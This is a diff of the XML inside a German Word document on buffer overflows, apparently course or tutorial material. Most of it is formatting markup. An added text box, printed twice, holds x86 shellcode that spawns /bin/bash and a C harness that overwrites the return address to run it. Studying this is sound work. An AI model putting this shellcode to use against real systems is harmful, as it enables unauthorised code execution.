+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">                   "\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a"</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">                   "\x8d\x56\x0e\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xcd</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\x80\xe8\xe3\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xff</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xff</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xff</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>"</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">                   "\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42"</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">                   "\x42\x43\x43\x43\x43";</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>main</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(){</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> *</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ret</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ret</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> = (</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> *)&amp;ret+2;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    (*</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ret</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>) = (</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>)</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>shellcode</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 14" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:17.75pt;margin-top:20pt;width:369pt;height:216.05pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> &lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdio.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>shellcode</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[] = "\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xeb</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a"</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">                   "\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a"</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">                   "\x8d\x56\x0e\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xcd</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\x80\xe8\xe3\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xff</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xff</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xff</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>"</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">                   "\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42"</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">                   "\x42\x43\x43\x43\x43";</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>main</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(){</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> *</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ret</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ret</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> = (</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> *)&amp;ret+2;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    (*</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>ret</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>) = (</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>)</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>shellcode</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Als C Code </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="8165"/>
+        </w:tabs>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId18"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1134" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -4121,7 +6057,7 @@
   <w:abstractNum w:abstractNumId="0">
     <w:nsid w:val="2B0F192C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="D8663992"/>
+    <w:tmpl w:val="6F08FDDA"/>
     <w:lvl w:ilvl="0" w:tplc="04070001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -4134,7 +6070,7 @@
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04070003" w:tentative="1">
+    <w:lvl w:ilvl="1" w:tplc="04070003">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -4544,6 +6480,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="4">
+    <w:nsid w:val="646A0DD3"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9496EAAE"/>
+    <w:lvl w:ilvl="0" w:tplc="04070001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="7456576A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="77AEE18C"/>
@@ -4663,13 +6712,16 @@
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>
 </file>
@@ -4900,6 +6952,30 @@
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:b/>
       <w:bCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="berschrift4">
+    <w:name w:val="heading 4"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:link w:val="berschrift4Zchn"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00660EE9"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="200" w:after="0"/>
+      <w:outlineLvl w:val="3"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:i/>
+      <w:iCs/>
       <w:color w:val="4F81BD" w:themeColor="accent1"/>
     </w:rPr>
   </w:style>
@@ -5125,6 +7201,21 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="berschrift4Zchn">
+    <w:name w:val="Überschrift 4 Zchn"/>
+    <w:basedOn w:val="Absatz-Standardschriftart"/>
+    <w:link w:val="berschrift4"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00660EE9"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -5354,6 +7445,30 @@
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:b/>
       <w:bCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="berschrift4">
+    <w:name w:val="heading 4"/>
+    <w:basedOn w:val="Standard"/>
+    <w:next w:val="Standard"/>
+    <w:link w:val="berschrift4Zchn"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00660EE9"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="200" w:after="0"/>
+      <w:outlineLvl w:val="3"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:i/>
+      <w:iCs/>
       <w:color w:val="4F81BD" w:themeColor="accent1"/>
     </w:rPr>
   </w:style>
@@ -5577,6 +7692,21 @@
       <w:color w:val="4F81BD" w:themeColor="accent1"/>
       <w:sz w:val="18"/>
       <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="berschrift4Zchn">
+    <w:name w:val="Überschrift 4 Zchn"/>
+    <w:basedOn w:val="Absatz-Standardschriftart"/>
+    <w:link w:val="berschrift4"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00660EE9"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
     </w:rPr>
   </w:style>
 </w:styles>
@@ -5865,4 +7995,16 @@
   <a:objectDefaults/>
   <a:extraClrSchemeLst/>
 </a:theme>
+</file>
+
+<file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APA.XSL" StyleName="APA"/>
+</file>
+
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B8FF6ECC-C66B-4ABB-A641-2E1E9082D712}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/buffer_overflow.docx
+++ b/buffer_overflow.docx
@@ -470,7 +470,7 @@
           <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:223.9pt;height:287.2pt" o:ole="">
             <v:imagedata r:id="rId9" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1411805176" r:id="rId10"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1411819137" r:id="rId10"/>
         </w:object>
       </w:r>
     </w:p>
@@ -495,7 +495,7 @@
           <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:301.45pt;height:467.6pt" o:ole="">
             <v:imagedata r:id="rId11" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1411805177" r:id="rId12"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1411819138" r:id="rId12"/>
         </w:object>
       </w:r>
     </w:p>
@@ -1962,27 +1962,14 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve"> - </w:t>
       </w:r>
@@ -2058,27 +2045,14 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve"> - ESP </w:t>
       </w:r>
@@ -2152,27 +2126,14 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
